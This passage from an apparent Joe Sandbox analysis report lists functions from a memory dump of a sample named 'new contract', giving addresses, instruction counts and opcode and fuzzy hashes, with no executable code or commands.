                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 25739f8b2efa938a31f3d5ee8c93a5b808291cc3c0c5e5b9d3f16c2ef711e10e
                                                                                                                                                                            • Instruction ID: caf41215a902f47478259165faf324d6ce1b88595b963b953e4a406e2aeeb364
                                                                                                                                                                            • Opcode Fuzzy Hash: 25739f8b2efa938a31f3d5ee8c93a5b808291cc3c0c5e5b9d3f16c2ef711e10e
                                                                                                                                                                            • Instruction Fuzzy Hash: 4611A1326441469FD711CF58D880BE6BBB9FB9A314F08C159E8498B316D732EC91CBA0
                                                                                                                                                                            Function 016AC810 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 7ff033d6aa87b79a51fd6c82e8732e60ed7a137010d3a327b4abb76fd20c1f27
                                                                                                                                                                            • Instruction ID: 64cd7ad88e6e38261f5b1c6dab01828e5b1d1f0e16a0ecaee0ee9c28f2c12f2a
                                                                                                                                                                            • Opcode Fuzzy Hash: 7ff033d6aa87b79a51fd6c82e8732e60ed7a137010d3a327b4abb76fd20c1f27
                                                                                                                                                                            • Instruction Fuzzy Hash: A11118B1E002099BCB00DFA9D941AAEBBF8FF58250F10806AA905E7351D674EE01CBA4
                                                                                                                                                                            Function 016CEA60 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f0bde2da9e81ff720ad2cd43ffd38af151228b4b1fb3459d1e74d8b718c07a12
                                                                                                                                                                            • Instruction ID: 1276ee9b32b09b234c5ea0984c6bd76d3f729567479239ff0e2ae3b600624718
                                                                                                                                                                            • Opcode Fuzzy Hash: f0bde2da9e81ff720ad2cd43ffd38af151228b4b1fb3459d1e74d8b718c07a12
                                                                                                                                                                            • Instruction Fuzzy Hash: 7B01B1321402119FCB32AF5D8C50936BFBAFF91E60B04442EE9555B351CB229C41CB91
                                                                                                                                                                            Function 0161C020 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                                            • Instruction ID: c8ae59a2e3330cbdaebd2db0c1d0df4dadfeb78a768ff84ee3cca20133c20b33
                                                                                                                                                                            • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                                            • Instruction Fuzzy Hash: 0B01D8322007459FEB2296A9DD40EAB77EAFFD6654F04881DAA468BA40DF75E402CB50
                                                                                                                                                                            Function 016620F0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 5bbe746b04433f27a0e62c13e13c129acca2cb7560cfe223e013227814c0c229
                                                                                                                                                                            • Instruction ID: 42d2a0bf636fec1f724514a734cc1113647a3cc7639d6cead0f459e5880344a8
                                                                                                                                                                            • Opcode Fuzzy Hash: 5bbe746b04433f27a0e62c13e13c129acca2cb7560cfe223e013227814c0c229
                                                                                                                                                                            • Instruction Fuzzy Hash: 93116D75A0020DEBCF05DFA8CC50BAEBBBAEB45284F00405DEA0197350DB35AE11CB90
                                                                                                                                                                            Function 0165E5CF Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3015513d1740b90757675114a6ec656c1a73f68736e8696c981add9ad6709da9
                                                                                                                                                                            • Instruction ID: 665d4a6b2a12c6fea47ee7c81800b534a44671e96fc7c822b5dc9f5ebf44fad1
                                                                                                                                                                            • Opcode Fuzzy Hash: 3015513d1740b90757675114a6ec656c1a73f68736e8696c981add9ad6709da9
                                                                                                                                                                            • Instruction Fuzzy Hash: F501DFB2241A02BBD711AB2ECD80E53BBADFB986A4B00062DB50583651DB24FC11C6A8
                                                                                                                                                                            Function 016B69C0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a5db5d953a30f1fa4aabc89135aac3a1579a3dd3778e654a151b1af0896c91ef
                                                                                                                                                                            • Instruction ID: da05d66013301281500a154096af2cb92b6d1a7632a460e2634832906921ea50
                                                                                                                                                                            • Opcode Fuzzy Hash: a5db5d953a30f1fa4aabc89135aac3a1579a3dd3778e654a151b1af0896c91ef
                                                                                                                                                                            • Instruction Fuzzy Hash: AC01FC322142169BD720DF6EDCC89A7FBACFF99660F114129ED5987380E7309951C7D1
                                                                                                                                                                            Function 016AC460 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e4471af0b228601dd5c692aa3da2b804a5c66915acfa3c4e312a3ade66f64a68
                                                                                                                                                                            • Instruction ID: 48712c5e68e7acd30d474e36a09de374c681dfc0ffa0f8aaba9450178db85566
                                                                                                                                                                            • Opcode Fuzzy Hash: e4471af0b228601dd5c692aa3da2b804a5c66915acfa3c4e312a3ade66f64a68
                                                                                                                                                                            • Instruction Fuzzy Hash: B3111B75A01209ABDF15EF68DC44EAE7BBAEB59250F004059F90197350DB35ED11CB94
                                                                                                                                                                            Function 016AC97C Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 86f7b38a57f4a184c7f0bb99e314476d7b3c2898f265e027596481611efdd0b7
                                                                                                                                                                            • Instruction ID: ed5d4facae18dc832ea2994d9dc17876a638d5fb3487bcd7ff35e2b76ed9c648
                                                                                                                                                                            • Opcode Fuzzy Hash: 86f7b38a57f4a184c7f0bb99e314476d7b3c2898f265e027596481611efdd0b7
                                                                                                                                                                            • Instruction Fuzzy Hash: 3B1139B16183099FC700DF69D841A5BBBF8FF99710F40851EB998D7391E630E901CB96
                                                                                                                                                                            Function 016ACA11 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 59a7415a9010eb528870c5290d7a3426876d36c41de2717091c59f94f32533c2
                                                                                                                                                                            • Instruction ID: b39549688666d0033fc1cc83c64838a8c2538078e905e2f558945dfe86a2340e
                                                                                                                                                                            • Opcode Fuzzy Hash: 59a7415a9010eb528870c5290d7a3426876d36c41de2717091c59f94f32533c2
                                                                                                                                                                            • Instruction Fuzzy Hash: C41179B16083089FC300DF69D841A5BBBF8FF99350F00851EBA58D73A4E630E900CB96
                                                                                                                                                                            Function 0163E016 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                                            • Instruction ID: c07f760d013db8ef19a0f55a4e0c07d21e75efa0dac933b5c81db8c0918cbb7e
                                                                                                                                                                            • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                                            • Instruction Fuzzy Hash: F1018B32200680DFE322871DCE48F26BBE8EF94764F0904A6F905CB7A1D739DC41CA25
                                                                                                                                                                            Function 0161826B Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d82b15eb158864e2d77919290c66ea35952b4d2d4274be3933def68cbdba649d
                                                                                                                                                                            • Instruction ID: 4bf0eaa01db59bb89fb5cf032c8b000cd76ec207405d0ee1a80035a785ef81a8
                                                                                                                                                                            • Opcode Fuzzy Hash: d82b15eb158864e2d77919290c66ea35952b4d2d4274be3933def68cbdba649d
                                                                                                                                                                            • Instruction Fuzzy Hash: 36018F317105059BD715EF69DC109AABBAEFF81620F5980699A01A7798EE20DD02C694
                                                                                                                                                                            Function 016CEB50 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: b2ecd00c2dc56ea74dd17eff94e079f6a7a7b4fad22f08866898d0bc11df1a33
                                                                                                                                                                            • Instruction ID: 85ab2c29366ef9096b33c0c37ed1564dc6f88a5422bb9dca5e0890dca5fb8621
                                                                                                                                                                            • Opcode Fuzzy Hash: b2ecd00c2dc56ea74dd17eff94e079f6a7a7b4fad22f08866898d0bc11df1a33
                                                                                                                                                                            • Instruction Fuzzy Hash: 2D018FB1284601AFD3315B19DD50B22BAB9EF95F60F05442EB2169B390D7B1A8418B68
                                                                                                                                                                            Function 01622582 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: da42ecc5e13c68dafdbff8aeff93acaf4aa86572347897780ad8973e29506b56
                                                                                                                                                                            • Instruction ID: 5a67bd4cf47d0f0547f85042cb5d512d6d4cce957957015ce90813fffe27bd57
                                                                                                                                                                            • Opcode Fuzzy Hash: da42ecc5e13c68dafdbff8aeff93acaf4aa86572347897780ad8973e29506b56
                                                                                                                                                                            • Instruction Fuzzy Hash: 65F0A433A41B21B7C7319B5A8D50F57BAAAEBC4B90F15842DE606A7740DA34ED01CAA0
                                                                                                                                                                            Function 0164C073 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                                            • Instruction ID: 6e88c0e01b46e890c05b090dd98b440f11268dad550fd637c3b3b19c44a3585a
                                                                                                                                                                            • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                                            • Instruction Fuzzy Hash: 92F062B2601615ABD328CF4DDC40E57FBEEDBD5A90F05812DA555D7320EA31DD05CBA0
                                                                                                                                                                            Function 016F634F Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a754ad86a7b7228dac79a62fad5b118a81e54a2522501f8832f492284a7b551d
                                                                                                                                                                            • Instruction ID: 5c062f96e283f9ceb12ce10ba2cdb825ab6ee17d45f382049c5675fa73bfe1b2
                                                                                                                                                                            • Opcode Fuzzy Hash: a754ad86a7b7228dac79a62fad5b118a81e54a2522501f8832f492284a7b551d
                                                                                                                                                                            • Instruction Fuzzy Hash: 38012176A10209ABDB04DFA9D951A9EB7F8FF58704F10405AE904E7350D6749A018BA4
                                                                                                                                                                            Function 0161C310 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                                            • Instruction ID: 20e5c249db115cf97c134ee0d0eb5f6dca3ae0c6010ea47362951b4820ff6788
                                                                                                                                                                            • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                                            • Instruction Fuzzy Hash: D1F02B33284A339BD7325A9D4C40B2FAA9A9FD1B64F1E0039F2099B74CCA658D0397D0
                                                                                                                                                                            Function 016F625D Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4192285dea0a92dac813158ed676254244fc85c411f82acb43d2eb4578afeb8e
                                                                                                                                                                            • Instruction ID: 89fd39f42cdf809fa47def846fa389f30da4bb84228c50cd083b39c6618ddd1d
                                                                                                                                                                            • Opcode Fuzzy Hash: 4192285dea0a92dac813158ed676254244fc85c411f82acb43d2eb4578afeb8e
                                                                                                                                                                            • Instruction Fuzzy Hash: 40014475A10209EFCB04DFA9D951AAEB7F9FF58304F10805AF904E7351D674AE01CBA4
                                                                                                                                                                            Function 016F62D6 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a7d360a58d26b206584a9361827ac99da1857a0cacc1a07ca14397588a462b85
                                                                                                                                                                            • Instruction ID: 68a54f6a9c0fe3ea2447e96272ee55590975c57ecaa057428bdeca458c42af73
                                                                                                                                                                            • Opcode Fuzzy Hash: a7d360a58d26b206584a9361827ac99da1857a0cacc1a07ca14397588a462b85
                                                                                                                                                                            • Instruction Fuzzy Hash: C6014471A00209EFDB04DFA9D945A9EB7F8FF58304F50405AFA14E7350D6749D01CBA4
                                                                                                                                                                            Function 0165CA6F Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                                                            • Instruction ID: b877054225ef4e3350f45bcc1562641029af9934b5ce7729de936fe31b072a35
                                                                                                                                                                            • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                                                            • Instruction Fuzzy Hash: 4701D1322016899BE722971DCD09F59BF9DEF82B50F0840A9FE04CB7A1D77AC801C614
                                                                                                                                                                            Function 016F61E5 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: b627fec25eb6c257f11bb661ccd3427e14fda07872aab31bb01d22e531437400
                                                                                                                                                                            • Instruction ID: ab05798bc39431e93aed1aa5a08349eb7750dde63312b09564f159c227f0e74c
                                                                                                                                                                            • Opcode Fuzzy Hash: b627fec25eb6c257f11bb661ccd3427e14fda07872aab31bb01d22e531437400
                                                                                                                                                                            • Instruction Fuzzy Hash: EC014F71A002499BDB04DFA9D945AEEBBF8FF59310F14405EE505E7380D774EA01CB98
                                                                                                                                                                            Function 016A63C0 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                                            • Instruction ID: ab26306ed7abc651caa3486531b9fbdb3f63f89b3d691d0ae7b1c26bf4fdd2a0
                                                                                                                                                                            • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                                            • Instruction Fuzzy Hash: 63F01D7220001EBFEF019F94DD80DAF7B7EEB59298B144129FA1192160D635DD21ABA0
                                                                                                                                                                            Function 016AA4B0 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a97a19f1e511e6cac47997f9e3e7c49fcdf049b4e51916ca43bc9068e806d256
                                                                                                                                                                            • Instruction ID: 7a96578ee20f513b93201952295299f1c8610d7e4bf7d31fecfe129c23fc849b
                                                                                                                                                                            • Opcode Fuzzy Hash: a97a19f1e511e6cac47997f9e3e7c49fcdf049b4e51916ca43bc9068e806d256
                                                                                                                                                                            • Instruction Fuzzy Hash: 41018536100209ABCF229E88DC40EDA3F66FB4C664F068106FE1866220C332D971EF81
                                                                                                                                                                            Function 0161C0F0 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4d5211fa5dbed6554b29c64cfdf4c556343e15259fa8762b85e5fdb01b01f988
                                                                                                                                                                            • Instruction ID: ede7ed8462e34303b96b5b381ac32028d9346f49bbb73c373df0cc580f1066d2
                                                                                                                                                                            • Opcode Fuzzy Hash: 4d5211fa5dbed6554b29c64cfdf4c556343e15259fa8762b85e5fdb01b01f988
                                                                                                                                                                            • Instruction Fuzzy Hash: 13F024712C42415BF310962D8C12F2632E6F7D4662F69842EEB058F3C5EA70DC0183A4
                                                                                                                                                                            Function 0165656A Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: dd8c275911cada6874f0d7bc4020c47943611fadd754df09e79c65f5c80e9089
                                                                                                                                                                            • Instruction ID: fa091f8a5dd776bde04385ee24cd51de919a09430703540afb45468368ef0dee
                                                                                                                                                                            • Opcode Fuzzy Hash: dd8c275911cada6874f0d7bc4020c47943611fadd754df09e79c65f5c80e9089
                                                                                                                                                                            • Instruction Fuzzy Hash: 3401AF702406819BE7669B3CCE58B2537A9BB81B48F984194BE41CBBE6DB28D842C614
                                                                                                                                                                            Function 016C437C Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                            • Instruction ID: c1ca94ce74311bf3f10d901a67da3aed31de444ff8f4bc22200474c277e1101e
                                                                                                                                                                            • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                            • Instruction Fuzzy Hash: 26F0893574192347EB75FA2F9C30B3EAA56DFD0E51B15062C9559CB780DF60DC018794
                                                                                                                                                                            Function 016AE872 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                                                            • Instruction ID: 08d0dc6a507cf316ec65b43cebbc3d2ad2e613624d2d7dc1e1e8c8d378320bc9
                                                                                                                                                                            • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
